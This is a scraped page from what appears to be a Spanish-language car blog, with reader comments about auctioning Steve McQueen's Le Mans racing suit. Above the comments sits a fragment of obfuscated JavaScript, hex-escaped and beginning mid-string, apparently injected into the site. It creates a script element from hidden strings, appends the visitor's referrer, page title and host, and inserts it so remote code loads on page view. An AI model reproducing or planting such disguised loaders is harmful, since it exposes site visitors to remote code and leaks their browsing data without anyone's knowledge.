54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

3 Comentarios, RSS

  1. Beppe Viola 06/12/2017 @ 12:34 pm

    Quizas el lote mejor de este remate es el numero 115: “Racing suit and helmet worn by Steve McQueen in Le Mans movie”
    El mameluco Hinchman blanco con los colores Gulf con el nombre bordado “Michael Delaney” , la ropa interior antiflama Atlas junto al casco Bell Jet azul ..- la cosa interesante es que pertenecieron por mas de 40 anios al (ex) adolescente aleman que los ganò como segundo premio en un concurso publicitario de una revista alemana y que los tuvo guardados en un ropero, decepcionado porque el primer premio era un Porsche 914…
    La estima es de u$s 400,000 a 500,000, (para tener un 914 hay que sacarle un cero…)

  2. luis 06/12/2017 @ 10:53 pm

    Lástima que recién lo leo, ya no hago a tiempo para ofertar (en escala también subastan?)

  3. oscar mendez dacal 13/12/2017 @ 3:45 pm

    A la California si se le saca el paragolpes trasero cromado le queda un paragolpes actual…

Tu email no será publicado. Required fields are marked *

*


*